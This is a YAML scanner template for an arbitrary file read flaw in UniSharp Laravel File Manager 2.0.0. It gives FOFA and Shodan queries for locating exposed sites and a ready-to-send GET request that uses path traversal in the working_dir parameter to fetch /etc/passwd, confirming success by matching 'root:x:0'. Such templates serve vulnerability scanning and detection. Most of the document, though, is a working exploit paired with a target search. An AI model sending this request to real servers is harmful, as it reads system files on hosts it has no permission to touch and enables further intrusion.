product: Laravel
vName: Laravel File Manager
type: 文件读取
vID: [ ]
level: 3
vDesc: UniSharp Larevel File Manager 2.0.0 is vulnerable to arbitrary file read.
version: ''
note: ''
search:
  FOFA: app="Laravel-Framework"
  shodan: http.html:"Laravel FileManager"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
        - status: 200